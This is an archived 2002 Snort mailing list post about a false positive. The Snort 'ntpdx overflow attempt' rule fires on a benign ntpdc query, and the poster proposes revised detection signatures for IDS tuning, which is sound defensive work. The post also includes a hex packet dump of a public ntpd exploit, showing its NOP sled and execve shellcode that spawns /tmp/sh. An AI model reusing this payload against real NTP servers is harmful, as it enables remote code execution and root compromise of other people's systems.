Snort mailing list archives

ntpdx overflow attempt sig triggered by ntpdc query

From: "James-lists" <hackerwacker () cybermesa com>
Date: Sat, 14 Dec 2002 04:06:08 -0700
 I was able to trigger this rule by doing "ntpdc -c peers <peer
address>"
 Ntpdc used is the current version of NTP & NTPD by David Mills.
 The RON box we host set this off and the researcher pointed out
 to me this was just a ntpdc query from him.

 [**] [1:312:2] EXPLOIT ntpdx overflow attempt [**]
 [Classification: Attempted Administrator Privilege Gain] [Priority: 1]
 12/14-00:58:02.732689 mrtg:57985 -> tarpit:123
 UDP TTL:64 TOS:0x0 ID:34983 IpLen:20 DgmLen:188 DF
 Len: 168
 [Xref => bugtraq 2540][Xref => arachnids 492]

 alert udp $EXTERNAL_NET any -> $HOME_NET 123 (msg:"EXPLOIT ntpdx
 overflow attempt"; dsize: >128; reference:arachnids,492;
 reference:bugtraq,2540; classtype:attempted-admin; sid:312; rev:2;)

 My hacked rule revisions, comments please

 alert udp $EXTERNAL_NET any -> $HOME_NET 123 (msg:"EXPLOIT ntpdx
 overflow attempt"; dsize: >188;\
 content:"|80 E8 DC FF FF FF 2F 74 6D 70 2F 73 68 90 90
 90|";reference:arachnids,492; reference:bugtraq,2540;
 classtype:attempted-admin; sid:312;\ rev:3;)
 or
 alert udp $EXTERNAL_NET any -> $HOME_NET 123 (msg:"EXPLOIT ntpdx
 overflow attempt"; dsize: >188;\
 content:"/tmp/sh";reference:arachnids,492; reference:bugtraq,2540;
 classtype:attempted-admin; sid:312; rev:3;)

James

 [root@tarpit]# ntpdc -c peers mrtg

 [root@mrtg james]# tcpdump -v -E type host mrtg and udp port 123
 tcpdump: listening on eth0
 03:19:30.262385 tarpit.58596 > mrtg..ntp:  [len=160] v2 res2 strat 0
 poll 2 prec 1 dist 0.000000 disp 0.000000 ref (unspec)@0.000000000 orig
 0.000000000 rec -0.000000000 xmt -0.000000000 (DF) (ttl 64, id 31704,
 len 188)
 03:19:30.262442 tarpit.58596 > mrtg.ntp:  [len=160] v2 res2 strat 0
poll
 2 prec 1 dist 0.000000 disp 0.000000 ref (unspec)@0.000000000 orig
 0.000000000 rec -0.000000000 xmt -0.000000000 (DF) (ttl 63, id 31704,
 len 188)
 03:19:30.262970 mrtg.ntp > tarpit.58596:  [len=136] v2 -1s res2 strat 0
 poll 2 prec 1 dist 4.000488 disp 16659.015945 ref
 (unspec)@8061450.042957365 orig 38.000000000 rec +10622733.000000226
xmt
 +83886042.254196226 (DF) [tos 0x10]  (ttl 64, id 0, len 164)
 03:19:30.263110 mrtg.ntp > tarpit.58596:  [len=136] v2 -1s res2 strat 0
 poll 2 prec 1 dist 4.000488 disp 16659.015945 ref
 (unspec)@8061450.042957365 orig 38.000000000 rec +10622733.000000226
xmt
 +83886042.254196226 (DF) [tos 0x10]  (ttl 63, id 0, len 164)

 All other ntp query types I tried were less than len 188

 Exploit, from Whitehats:

 This is a trace of the ntp exploit "ntpd-exp.c" found on
 securityfocus.com which was written by babcia padlina ltd.

 04/09-12:28:17.176237 192.0.0.10:1109 -> 192.0.0.1:123
 UDP TTL:64 TOS:0x0 ID:60376 IpLen:20 DgmLen:540
 Len: 520
 16 02 00 01 00 00 00 00 00 00 01 36 73 74 72 61  ...........6stra
 74 75 6D 3D 90 90 90 90 90 90 90 90 90 90 90 90  tum=............
 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
 EB 1F 5E 89 76 08 31 C0 88 46 07 89 46 0C B0 0B  ..^.v.1..F..F...
 89 F3 8D 4E 08 8D 56 0C CD 80 31 DB 89 D8 40 CD  ...N..V...1...@.
 80 E8 DC FF FF FF 2F 74 6D 70 2F 73 68 90 90 90  ....../tmp/sh...
 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
 77 F7 FF BF 77 F7 FF BF 90 90 90 90 90 90 90 90  w...w...........
 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................




-------------------------------------------------------
This sf.net email is sponsored by:
With Great Power, Comes Great Responsibility 
Learn to use your power at OSDN's High Performance Computing Channel
http://hpc.devchannel.org/
_______________________________________________
Snort-users mailing list
Snort-users () lists sourceforge net
Go to this URL to change user options or unsubscribe:
https://lists.sourceforge.net/lists/listinfo/snort-users
Snort-users list archive:
http://www.geocrawler.com/redir-sf.php3?list=snort-users
Current thread:

ntpdx overflow attempt sig triggered by ntpdc query James-lists (Dec 14)
- <Possible follow-ups>
- ntpdx overflow attempt sig triggered by ntpdc query james (Dec 17)